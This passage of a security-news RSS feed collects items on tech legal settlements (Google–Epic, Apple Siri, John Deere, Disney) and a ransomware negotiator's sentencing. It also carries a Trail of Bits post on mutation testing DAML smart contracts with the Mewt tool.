<content:encoded><![CDATA[An anonymous reader quotes a report from Ars Technica: Big changes are coming to Android apps, but they're not the changes Google wanted. The settlement between Google and Epic that aimed to put to rest the companies' long-running antitrust battle is being withdrawn, and that means third-party app stores are coming to the Play Store. Google has confirmed that it will begin distributing rival app stores next week, setting the stage for competing platforms to take a bite out of Google's Android revenue stream. [...] Google and Epic were set to return to court on July 16 to argue in favor of the settlement. However, the writing may have been on the wall. In a recent expert analysis provided to the court, MIT economics professor Nancy Rose noted that the settlement was "unlikely to enable Google Play's potential competitors to overcome their long-standing network-effect disadvantage in a timely manner."
 
With settlement approval looking increasingly unlikely, Epic and Google agreed this week to call the whole thing off. Here's how Google Trust and Reputation Communications Lead Dan Jackson explains the company's decision: "We've agreed with Epic to withdraw our motion to modify the US Court's injunction rather than prolonging this process which creates uncertainty for the ecosystem. This allows us to focus on executing our recently announced global business model evolution to deliver greater app store choice, lower prices, and more opportunities for developers and users. We remain committed to maintaining Android's industry-leading security and fostering a competitive ecosystem where every app store and developer has the freedom to compete. In parallel, we continue to comply with the US Court's injunction."
 
In a brief filing (PDF), Google's legal team informs the court that Google is prepared to begin distributing third-party app stores in Google Play on July 22. Under the terms of Judge Donato's original injunction, these stores will have access to the full catalog of Google Play apps by default. Developers will have the option to opt out of distribution in these stores, and Google has a support page explaining how to do so. Google also has documentation on how app stores can get access to the Google Play catalog. It won't be mirroring those apps in any shady storefront that asks. The court has allowed Google to charge reasonable fees to cover its security and compliance review of third-party stores, which will be $5,000 per year.
 
Google will also require approved stores to block malware, respect intellectual property, and include mechanisms to update and uninstall apps. App stores can be removed from the program if more than 1 percent of attempted app installs appear to be malware or unwanted software. It's unclear if there will be separate, possibly more stringent requirements for storefront distribution in the Play Store. However, Google is prohibited from unreasonably blocking third-party store clients uploaded to Google Play. The changes Google has announced under the Epic agreement will proceed for now. That means Registered App Stores will happen globally, but they will probably only appear in the Play Store for US users. Google hasn't specified if there will be any differences in the features available to the stores downloaded from Play versus registered stores.<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Google+and+Epic+Cancel+Settlement%3B+Third-Party+App+Stores+Coming+To+Google+Play%3A+https%3A%2F%2Fyro.slashdot.org%2Fstory%2F26%2F07%2F15%2F1738217%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fyro.slashdot.org%2Fstory%2F26%2F07%2F15%2F1738217%2Fgoogle-and-epic-cancel-settlement-third-party-app-stores-coming-to-google-play%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://yro.slashdot.org/story/26/07/15/1738217/google-and-epic-cancel-settlement-third-party-app-stores-coming-to-google-play?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[The Disney settlement is a story about two layers of infrastructure that no longer line up]]></title>
<description><![CDATA[For privacy leaders trying to decide what to do on Monday morning, the most useful lessons from the Disney settlement are technical.]]></description>
<link>https://tsecurity.de/de/3669989/it-nachrichten/the-disney-settlement-is-a-story-about-two-layers-of-infrastructure-that-no-longer-line-up/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3669989/it-nachrichten/the-disney-settlement-is-a-story-about-two-layers-of-infrastructure-that-no-longer-line-up/</guid>
<pubDate>Wed, 15 Jul 2026 10:18:17 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[For privacy leaders trying to decide what to do on Monday morning, the most useful lessons from the Disney settlement are technical.]]></content:encoded>
</item>
<item>
<title><![CDATA[When the Negotiator Helps Hackers]]></title>
<description><![CDATA[Author: Security Weekly - A CRA Resource - Bewertung: 0x - Views:31 A ransomware negotiator was sentenced to federal prison after prosecutors said he secretly worked with the BlackCat ransomware group while negotiating on behalf of victims. According to court filings, he shared insurance limits, ...]]></description>
<link>https://tsecurity.de/de/3669200/it-security-video/when-the-negotiator-helps-hackers/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3669200/it-security-video/when-the-negotiator-helps-hackers/</guid>
<pubDate>Wed, 15 Jul 2026 00:18:33 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Security Weekly - A CRA Resource - Bewertung: 0x - Views:31 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/M8CgmsqoDXg?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>A ransomware negotiator was sentenced to federal prison after prosecutors said he secretly worked with the BlackCat ransomware group while negotiating on behalf of victims. According to court filings, he shared insurance limits, negotiating positions, and internal settlement thresholds.<br />
<br />
The case illustrates that insider threats aren't limited to employees inside victim organizations. Even trusted third parties can become a critical point of failure when handling sensitive incident response information.<br />
<br />
What safeguards should organizations require when sharing sensitive information with outside incident response and ransomware negotiation firms?<br />
<br />
Subscribe to our podcasts: https://securityweekly.com/subscribe<br />
<br />
#Ransomware #InsiderThreat #SecurityWeekly #Cybersecurity #InformationSecurity #AI #InfoSec<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple’s $250 Million Siri AI Settlement Finally Moves Forward]]></title>
<description><![CDATA[Apple recently agreed to pay $250 million to settle a major class action lawsuit regarding some missing artificial intelligence features. The lawsuit claimed that the company heavily advertised a smarter and much more personal version of its popular voice assistant when the newest phones launched...]]></description>
<link>https://tsecurity.de/de/3659626/ios-mac-os/apples-250-million-siri-ai-settlement-finally-moves-forward/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3659626/ios-mac-os/apples-250-million-siri-ai-settlement-finally-moves-forward/</guid>
<pubDate>Fri, 10 Jul 2026 14:07:01 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Apple recently agreed to pay $250 million to settle a major class action lawsuit regarding some missing artificial intelligence features. The lawsuit claimed that the company heavily advertised a smarter and much more personal version of its popular voice assistant when the newest phones launched. However, those specific upgrades were significantly delayed, leaving millions of eager buyers waiting for software updates that did not arrive on time.



The lawsuit focuses on delayed artificial intelligence features



When the newest devices were first announced, the company promised a major update to Siri that would allow it to understand personal context and take actions across different apps. A lawsuit filed against the company argued that these marketing campaigns convinced people to upgrade their devices to get features that were not actually available.



Instead of fighting the claims in a long trial, the company decided to settle the case for a quarter of a billion dollars. Apple agreed to pay the massive sum without admitting any actual wrongdoing. The company stated it wanted to move past the distraction and keep its focus on building new hardware and software.



Here is a list of the specific phones that qualify



The settlement is currently waiting for final approval from a federal judge. If the court gives the green light, owners of specific devices purchased in the United States between June 10, 2024, and March 29, 2025, can file a claim to get some cash back.



To qualify for a piece of the settlement, you must have purchased one of these supported iPhone models during that exact time window:




iPhone 15 Pro



iPhone 15 Pro Max



iPhone 16



iPhone 16 Plus



iPhone 16 Pro



iPhone 16 Pro Max



iPhone 16e




Users could receive up to ninety-five dollars per device



If you own an eligible device, the exact amount of money you get will depend entirely on how many other people actually submit a claim. The lawyers handling the case expect the standard payment to be around $25 for each phone.



However, if a very small number of people fill out the necessary paperwork, that individual payout could jump to as high as $95 per device. Eligible buyers in the United States should look out for official website and email notices in the coming weeks that explain exactly how to submit a claim before the deadline. While the voice assistant updates are still rolling out slowly, at least some buyers will get a small refund for the wait.]]></content:encoded>
</item>
<item>
<title><![CDATA[John Deere Farm Equipment Owners Have Right-to-Repair, F.T.C. Says]]></title>
<description><![CDATA[A settlement by the company with the Federal Trade Commission will allow farmers and local mechanics to make their own fixes, instead of relying on authorized dealers.]]></description>
<link>https://tsecurity.de/de/3659343/it-nachrichten/john-deere-farm-equipment-owners-have-right-to-repair-ftc-says/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3659343/it-nachrichten/john-deere-farm-equipment-owners-have-right-to-repair-ftc-says/</guid>
<pubDate>Fri, 10 Jul 2026 12:03:42 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A settlement by the company with the Federal Trade Commission will allow farmers and local mechanics to make their own fixes, instead of relying on authorized dealers.]]></content:encoded>
</item>
<item>
<title><![CDATA[Block reaches $45M settlement with 46 states over Cash App fraud probe]]></title>
<description><![CDATA[State attorneys general said they found that Block misled users by falsely advertising that Cash App provided bank-like protections, including advanced fraud detection.]]></description>
<link>https://tsecurity.de/de/3657486/it-nachrichten/block-reaches-45m-settlement-with-46-states-over-cash-app-fraud-probe/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3657486/it-nachrichten/block-reaches-45m-settlement-with-46-states-over-cash-app-fraud-probe/</guid>
<pubDate>Thu, 09 Jul 2026 17:17:35 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[State attorneys general said they found that Block misled users by falsely advertising that Cash App provided bank-like protections, including advanced fraud detection.]]></content:encoded>
</item>
<item>
<title><![CDATA[Despite ‘misgivings,’ judge approves Elon Musk’s $1.5 million SEC settlement]]></title>
<description><![CDATA[The saga of Musk's tussle with the SEC over how he disclosed his growing stake in Twitter (now called X) has come to an end.]]></description>
<link>https://tsecurity.de/de/3655611/ai-nachrichten/despite-misgivings-judge-approves-elon-musks-15-million-sec-settlement/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3655611/ai-nachrichten/despite-misgivings-judge-approves-elon-musks-15-million-sec-settlement/</guid>
<pubDate>Thu, 09 Jul 2026 01:16:59 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The saga of Musk's tussle with the SEC over how he disclosed his growing stake in Twitter (now called X) has come to an end.]]></content:encoded>
</item>
<item>
<title><![CDATA[John Deere Agrees To 10-Year Right-To-Repair Deal In FTC Antitrust Lawsuit]]></title>
<description><![CDATA[John Deere has agreed to a 10-year FTC-supervised right-to-repair settlement requiring it to provide farmers and independent repair shops with the same repair resources available to authorized dealers. The deal resolves antitrust claims from the FTC and five states alleging Deere monopolized equi...]]></description>
<link>https://tsecurity.de/de/3655539/it-security-nachrichten/john-deere-agrees-to-10-year-right-to-repair-deal-in-ftc-antitrust-lawsuit/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3655539/it-security-nachrichten/john-deere-agrees-to-10-year-right-to-repair-deal-in-ftc-antitrust-lawsuit/</guid>
<pubDate>Thu, 09 Jul 2026 00:23:49 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[John Deere has agreed to a 10-year FTC-supervised right-to-repair settlement requiring it to provide farmers and independent repair shops with the same repair resources available to authorized dealers. The deal resolves antitrust claims from the FTC and five states alleging Deere monopolized equipment repair services, contributing to higher costs and delays for farmers. Wired reports: The full statement (PDF) lays out obligations for John Deere's repair services, requiring the company to give farmers and third-party repair shops access to the same equipment and repair resources it provides to official John Deere dealers. This includes software capabilities, such as reading and resetting codes and pairing with other software, which customers have long had limited access to, creating delays when diagnosing equipment problems. Delayed fixes can mean delayed harvests, which many farmers saw as a fundamental threat to their livelihoods.
 
Under the agreement, John Deere will be required to provide this level of access, equipment, and services for the next 10 years, monitored by the FTC. [...] John Deere has maintained that it already has robust repair resources for its customers, including service manuals and diagnostic equipment. In John Deere's press release, the company says the settlement is in line with what it has been doing all along, saying that "the agreement reinforces Deere's continued innovation toward more flexible repair options, emphasizing increased access and transparency for customers. It formalizes Deere's ongoing commitment to expanding access to diagnostic and repair tools."<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=John+Deere+Agrees+To+10-Year+Right-To-Repair+Deal+In+FTC+Antitrust+Lawsuit%3A+https%3A%2F%2Fyro.slashdot.org%2Fstory%2F26%2F07%2F08%2F2049231%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fyro.slashdot.org%2Fstory%2F26%2F07%2F08%2F2049231%2Fjohn-deere-agrees-to-10-year-right-to-repair-deal-in-ftc-antitrust-lawsuit%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://yro.slashdot.org/story/26/07/08/2049231/john-deere-agrees-to-10-year-right-to-repair-deal-in-ftc-antitrust-lawsuit?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Judge approves $1.5 million SEC-Musk settlement over Twitter investment]]></title>
<description><![CDATA[The opinion says whether it's fair is 'for our citizenry to decide at the ballot box.']]></description>
<link>https://tsecurity.de/de/3655514/it-nachrichten/judge-approves-15-million-sec-musk-settlement-over-twitter-investment/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3655514/it-nachrichten/judge-approves-15-million-sec-musk-settlement-over-twitter-investment/</guid>
<pubDate>Wed, 08 Jul 2026 23:47:26 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The opinion says whether it's fair is 'for our citizenry to decide at the ballot box.']]></content:encoded>
</item>
<item>
<title><![CDATA[The FTC Settlement With John Deere Is a Huge Win for the Right-to-Repair Movement]]></title>
<description><![CDATA[After more than a decade of pushback, farmers and repair advocates have won access to equipment and services John Deere had long kept under its control.]]></description>
<link>https://tsecurity.de/de/3655412/it-nachrichten/the-ftc-settlement-with-john-deere-is-a-huge-win-for-the-right-to-repair-movement/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3655412/it-nachrichten/the-ftc-settlement-with-john-deere-is-a-huge-win-for-the-right-to-repair-movement/</guid>
<pubDate>Wed, 08 Jul 2026 22:31:16 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[After more than a decade of pushback, farmers and repair advocates have won access to equipment and services John Deere had long kept under its control.]]></content:encoded>
</item>
<item>
<title><![CDATA[FTC reaches settlement that brings right-to-repair to John Deere farm equipment]]></title>
<description><![CDATA[The FTC sued the famed green tractor company last year.]]></description>
<link>https://tsecurity.de/de/3655389/it-nachrichten/ftc-reaches-settlement-that-brings-right-to-repair-to-john-deere-farm-equipment/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3655389/it-nachrichten/ftc-reaches-settlement-that-brings-right-to-repair-to-john-deere-farm-equipment/</guid>
<pubDate>Wed, 08 Jul 2026 22:17:19 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The FTC sued the famed green tractor company last year.]]></content:encoded>
</item>
<item>
<title><![CDATA[Mutation testing comes to DAML]]></title>
<description><![CDATA[In April we released Mewt, our open-source mutation-testing engine that finds the gaps in your test suite. Today we’re expanding it with support for DAML, the language Canton Network applications are written in. Mewt now reads DAML, generates several classes of mutants (including two built for DA...]]></description>
<link>https://tsecurity.de/de/3654082/it-security-nachrichten/mutation-testing-comes-to-daml/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3654082/it-security-nachrichten/mutation-testing-comes-to-daml/</guid>
<pubDate>Wed, 08 Jul 2026 13:08:35 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>In April we released <a href="https://blog.trailofbits.com/2026/04/01/mutation-testing-for-the-agentic-era/">Mewt</a>, our open-source mutation-testing engine that finds the gaps in your test suite. Today we’re expanding it with support for DAML, the language Canton Network applications are written in. Mewt now reads DAML, generates several classes of mutants (including two built for DAML’s authorization primitives), and runs them through your existing test suite to count how many mutants survive. If you want to try it, simply install Mewt from the <a href="https://github.com/trailofbits/mewt">repository</a>, point a <code>mewt.toml</code> at your project and its test command, and use <code>mewt run</code>.</p>
<p>For a team shipping DAML to production, that count is what a passing test run is actually worth: it puts a number on how much your suite checks, whereas a green run on its own does not.</p>
<h2>Why DAML’s coverage reports lie</h2>
<p>Test coverage is the most reassuring lie in smart-contract development. Hitting 100% line coverage tells you the test runner walked the code; it does not tell you whether any test would fail if that code stopped doing what it is supposed to. We have been grading test harnesses by how many mutants they kill since at least <a href="https://blog.trailofbits.com/2019/01/23/fuzzing-an-api-with-deepstate-part-2/">2019</a>, and <a href="https://blog.trailofbits.com/2025/09/18/use-mutation-testing-to-find-the-bugs-your-tests-dont-catch/">our primer on finding the bugs your tests don’t catch</a> shows how a green suite can still miss the bug that matters.</p>
<p>DAML’s built-in coverage measures execution at the template and choice level: which templates were created and which choices were exercised over the test run. It reports whether each choice was exercised, not what happened inside it. A test that exercises a choice once and asserts nothing about the result reports that choice as covered. The report prints the same green percentage whether the test verifies the outcome or discards it.</p>
<h2>How mutation testing works</h2>
<p>Instead of asking whether your tests reached the code, mutation testing grades your tests by sabotaging that code. The engine generates mutants, copies of the code that each carry one small deliberate change: a flipped comparison, a removed branch, a dropped party. It then runs your test suite against each one. A mutant that makes the suite fail is caught; a mutant that passes every test survives. Every survivor is a change your tests let through, and each one is either harmless or a potential bug. The harmless ones are equivalent code no test could distinguish or a branch no execution reaches, and you can set those aside. The rest are a to-do list: each one is a specific test you are missing, a case your suite should check but does not, occasionally with a real bug sitting behind the gap. The primer above describes a real audit where a mutation campaign surfaced a high-severity bug that the project’s tests had missed.</p>
<h2>Mutation testing forces the unhappy path</h2>
<p>A DAML contract encodes rights and obligations between named parties: who holds what, who owes what to whom, and who must authorize each step. A party is not an anonymous address. It represents a real organization or person, and the contract is the rulebook for how those parties interact, including which of them can take which action, what each is allowed to see, and what stays private between them.</p>
<p>Authorization is how that rulebook is enforced: who may take which action. It is also easy to get wrong in ordinary ways, such as a typo in a controller clause, a missing party, an extra one left over from a refactor. Every combination type-checks, so nothing rejects it before it ships. A static analyzer can flag suspicious patterns, but it has no way to know which party should hold which authority on your contract. That knowledge lives in your specification, and for most projects, the only executable form of the specification is the test suite. Happy-path tests supply every signature the contract asks for and confirm the transaction succeeds. They never try the negative case—removing a required signature and checking that the ledger rejects the transaction—so they never actually test whether that signature was required at all. If the tests don’t encode that rule, nothing downstream can recover it. Mutation testing is what tells you whether they do.</p>
<p>A green test run tells you your tests passed today. Mutation testing asks the harder question: would your tests catch a mistake, now or after the next code change? Where the answer is no, you have found a test case worth writing.</p>
<h2>What Mewt adds for DAML</h2>
<p>Mewt parses every language it supports with a tree-sitter grammar. As of mid-2026, there is no maintained tree-sitter grammar for DAML, so we reused the upstream <code>tree-sitter-haskell</code> grammar. DAML is Haskell-shaped, but its contract constructs (<code>template</code>, <code>choice</code>, <code>controller</code>, and <code>signatory</code>) are not Haskell, and the grammar parses them as error-recovered subtrees. That matters less than it sounds. The common mutations still work on DAML’s ordinary expressions, so Mewt swaps arithmetic and comparison operators, flips Booleans, and removes branches just as it does in any other language, with only small adjustments where DAML’s surface syntax differs (DAML writes <code>/=</code> where most languages write <code>!=</code>). We got most of the value of a from-scratch grammar without building one.</p>
<p>The new engineering went into DAML’s authorization primitives, where the authorization bugs from the previous section live. Mewt adds two DAML-specific mutations:</p>
<ul>
<li>
<p><strong>Controller party swap</strong> (CPS in Mewt’s output): replace one party in a <code>controller</code> clause with another party that is in scope at that site.</p>
</li>
<li>
<p><strong>Controller party removal</strong> (CPR): drop one party from a multi-party controller list.</p>
</li>
</ul>
<p>Both target the same question: if the set of parties allowed to exercise this choice silently changed, would any test fail? They are a deliberately small starting set aimed at the bug class above, and more DAML-specific mutations are in the pipeline.</p>
<p>Driving a campaign needs no new harness. A short <code>mewt.toml</code> names the files to mutate and the test command (<code>dpm test</code> for a Daml 3 project), and <code>mewt run</code> does the rest, reporting each mutant as caught or surviving. The setup is deliberately small: trying it on your own project costs minutes, and we encourage exactly that.</p>
<h2>What a surviving mutant looks like</h2>
<p>Picture a conditional payment between a buyer and a seller: the buyer sets money aside for the goods, and paying it out to the seller requires both parties to sign off. The buyer’s signature is the delivery confirmation. In DAML, that policy is one line: the <code>controller</code> line on the <code>Release</code> choice.</p>
<figure class="highlight">
 <pre tabindex="0"><code class="language-" data-lang="">template ConditionalPayment
 with
 buyer : Party
 seller : Party
 amount : Decimal
 where
 signatory buyer
 observer seller

 choice Release : ()
 with
 paid : Decimal
 controller buyer, seller
 do
 assert (paid == amount)</code></pre>
 <figcaption><span>Figure 1: A payment that requires both the buyer and the seller to approve its release</span></figcaption>
</figure>
<p>A typical happy-path test creates the payment and has both parties approve the release. The <code>actAs buyer &lt;&gt; actAs seller</code> line submits the command with both parties’ authority:</p>
<figure class="highlight">
 <pre tabindex="0"><code class="language-" data-lang="">testHappyPath : Script ()
testHappyPath = script do
 buyer &lt;- allocateParty "Buyer"
 seller &lt;- allocateParty "Seller"
 payment &lt;- submit buyer do
 createCmd ConditionalPayment with
 buyer
 seller
 amount = 100.0
 submit (actAs buyer &lt;&gt; actAs seller) do
 exerciseCmd payment Release with paid = 100.0
 pure ()</code></pre>
 <figcaption><span>Figure 2: The happy-path test. It passes, and coverage reports 100%.</span></figcaption>
</figure>
<p>The test passes, and by the usual measure the suite looks complete: running <code>dpm test</code> with coverage reporting enabled shows full coverage.</p>
<figure class="highlight">
 <pre tabindex="0"><code class="language-" data-lang="">$ dpm test --show-coverage --coverage-ignore-choice Archive
testHappyPath: ok, 0 active contracts, 2 transactions.
- Internal templates: 1 defined, 1 (100.0%) created
- Internal template choices: 1 defined, 1 (100.0%) exercised</code></pre>
 <figcaption><span>Figure 3: The coverage report for the happy-path test. Every template is created and every choice is exercised, for 100% coverage.</span></figcaption>
</figure>
<p>The <code>--coverage-ignore-choice Archive</code> flag deserves a word. Every DAML template automatically gets an implicit <code>Archive</code> choice. It is not part of the business logic under test, so we exclude it for simplicity. With it included, this one-choice template would report 50% even though the test exercises everything we wrote.</p>
<p>Run Mewt on the project and it generates seven mutants. The test suite catches three of them. Four survive. Here is one of the survivors, shown as the diff Mewt reports:</p>
<figure class="highlight">
 <pre tabindex="0"><code class="language-" data-lang=""> choice Release : ()
 with
 paid : Decimal
- controller buyer, seller
+ controller seller
 do
 assert (paid == amount)</code></pre>
 <figcaption><span>Figure 4: The controller-removal mutant that survives the test suite</span></figcaption>
</figure>
<p>Re-run the test suite against this mutant. It still passes, and coverage still reports 100%. The contract claims releasing the buyer’s money requires both parties. The mutant lets the seller release it to themselves without the buyer ever confirming delivery. The tests report green either way. Only a test that tries the <em>forbidden</em> path, the seller acting alone, expecting the ledger to reject it, can tell the two contracts apart. No such test exists, and the mutation score says so. (The other three survivors tell the same story from different angles: the buyer-alone twin of this mutant, and two mutants that weaken the <code>paid == amount</code> check to <code>&lt;=</code> and <code>&gt;=</code>, which survive because the test only ever pays the exact amount.)</p>
<p>Step back, and this is the whole point of the exercise. Your tests are the executable specification of your code. Here the implementation changed, one required approval instead of two, and the specification did not react. That means the expected behavior was underspecified all along: whether both the buyer and the seller have to sign off, or just one of them, was never actually written down anywhere a machine could check. Every controller combination type-checks, and coverage reports 100% for all of them. The only place “both must sign” can exist in checkable form is a test that expects the weakened contract to fail, and writing that test is exactly what the surviving mutant tells you to do.</p>
<h2>Limitations and what comes next</h2>
<p>Mewt is not magic. Two limits are worth knowing before you run your first campaign: not every survivor is a real gap, and a campaign costs time. The roadmap that follows them is where we are taking the work next.</p>
<p>Equivalent mutants exist: some survivors turn out to be semantically identical to the original program, so no test could ever catch them. Few public DAML codebases on GitHub come with a full test suite, so we are glad OpenZeppelin open-sourced its <code>canton-stablecoin</code> reference implementation. Mewt generated hundreds of mutants for it. We ran the highest-priority ones through the existing test suite, and seven of those survived. Three were equivalent mutants or sat behind a guard that no path reaches, and the other four were genuine missing test cases. None of the survivors we reviewed pointed to a bug. Such a clean result is what you want when you run Mewt on your own code, and triaging them took minutes.</p>
<p>One of those equivalent mutants shows what that means concretely. A helper computed accrued debt:</p>
<figure class="highlight">
 <pre tabindex="0"><code class="language-" data-lang="">accrueDebt currentDebt lastAccrual now annualRate =
 if currentDebt == 0.0 || annualRate == 0.0 then currentDebt
 else
 let elapsedYears = ... -- elapsed time as a fraction of a year
 in currentDebt * (1.0 + annualRate * elapsedYears)</code></pre>
 <figcaption><span>Figure 5: The accrueDebt helper. Its first-line guard is a shortcut that returns the same value the calculation already produces.</span></figcaption>
</figure>
<p>Mewt forced the <code>if</code> to always take the <code>else</code> branch. No test failed, and none ever could: when the debt is zero, the formula multiplies by zero and returns zero, and when the rate is zero, it multiplies the debt by one and returns it unchanged. The guard is a shortcut that returns the value the formula already produces, so removing it changes nothing. Mewt suppresses the equivalent mutants it can detect. The rest need a reviewer’s judgment to dismiss.</p>
<p>Campaigns cost time in two places. The machine part: Mewt runs your test suite once per mutant, so the wall-clock cost is roughly the number of mutants times how long one test run takes, plus a rebuild if your project needs one. That is minutes on a small codebase and hours on a large one or a slow suite, so the cadence that works is nightly or weekly rather than per-commit. The human part: someone has to look at the survivors. We are working on that front from several directions at Trail of Bits, including our <a href="https://github.com/trailofbits/skills/tree/main/plugins/mutation-testing">mutation-testing skill</a> that helps configure campaigns for your project, and <a href="https://blog.trailofbits.com/2026/04/23/trailmark-turns-code-into-graphs/">Trailmark</a> with its <code>genotoxic</code> triage skill. None of these understand DAML yet, but the direction is clear: given the right harness and tools, the time-consuming parts of a campaign can be handed to AI agents. The effort is modest and the payoff is concrete: each genuine survivor is a specific test you can write, and every test you add makes your suite enforce one more guarantee your contracts are supposed to make.</p>
<p>Also on the roadmap: choice-consumption mutations (<code>consuming</code> vs <code>nonconsuming</code>) sit cleanly on top of the controller-mutation scaffolding and target a bug class Mewt does not yet reach.</p>
<h2>Dive in</h2>
<p>Install Mewt from the <a href="https://github.com/trailofbits/mewt">repository</a>, point a <code>mewt.toml</code> at your project and its test command, and <code>mewt run</code>. The quickstart in the README covers the rest. DAML works out of the box. Everything here ran on Daml 3.4 with <code>dpm</code>, but Mewt just drives whatever test command you configure, so Daml 2 projects using the <code>daml</code> assistant work the same way.</p>
<p>Mutation testing complements the rest of your security stack, the type checkers, linters, and property tests you already run, rather than replacing any of it.</p>
<p>If you’re building on Canton, we help teams with security reviews of DAML applications and with the way the code gets built: working directly with your engineers on the development process itself. <a href="https://www.trailofbits.com/contact/">Contact us</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Disney just agreed to pay out $50 million to some YouTube TV and DirecTV Stream subscribers — here’s how to make a claim for your share and find out if you’re owed it]]></title>
<description><![CDATA[YouTube TV and DirecTV Stream subscribers, listen up — you could be owed a share of $50 million thanks to a Disney lawsuit settlement.]]></description>
<link>https://tsecurity.de/de/3652974/it-nachrichten/disney-just-agreed-to-pay-out-50-million-to-some-youtube-tv-and-directv-stream-subscribers-heres-how-to-make-a-claim-for-your-share-and-find-out-if-youre-owed-it/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3652974/it-nachrichten/disney-just-agreed-to-pay-out-50-million-to-some-youtube-tv-and-directv-stream-subscribers-heres-how-to-make-a-claim-for-your-share-and-find-out-if-youre-owed-it/</guid>
<pubDate>Wed, 08 Jul 2026 02:02:57 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[YouTube TV and DirecTV Stream subscribers, listen up — you could be owed a share of $50 million thanks to a Disney lawsuit settlement.]]></content:encoded>
</item>
<item>
<title><![CDATA[If You Subscribed to YouTube TV or DirecTV, You Could Be Eligible for a Settlement Payout]]></title>
<description><![CDATA[Disney settled a lawsuit that alleged the corporation forced higher prices for live TV streaming subscriptions.]]></description>
<link>https://tsecurity.de/de/3652693/it-nachrichten/if-you-subscribed-to-youtube-tv-or-directv-you-could-be-eligible-for-a-settlement-payout/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3652693/it-nachrichten/if-you-subscribed-to-youtube-tv-or-directv-you-could-be-eligible-for-a-settlement-payout/</guid>
<pubDate>Tue, 07 Jul 2026 22:18:12 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Disney settled a lawsuit that alleged the corporation forced higher prices for live TV streaming subscriptions.]]></content:encoded>
</item>
<item>
<title><![CDATA[Mastercard Aktie: Stablecoin-Pakt mit Yellow Card () | aktiencheck.de]]></title>
<description><![CDATA[Wachstumsmotor Cybersicherheit. Das operative Geschäft liefert das nötige Fundament für diese Expansion. Im ersten Quartal 2026 stieg der Umsatz um ...]]></description>
<link>https://tsecurity.de/de/3651253/it-security-nachrichten/mastercard-aktie-stablecoin-pakt-mit-yellow-card-aktiencheckde/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3651253/it-security-nachrichten/mastercard-aktie-stablecoin-pakt-mit-yellow-card-aktiencheckde/</guid>
<pubDate>Tue, 07 Jul 2026 12:54:02 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Wachstumsmotor <b>Cybersicherheit</b>. Das operative Geschäft liefert das nötige Fundament für diese Expansion. Im ersten Quartal 2026 stieg der Umsatz um ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Zombie 'Who Owns Unix?' Lawsuit Comes Alive Again]]></title>
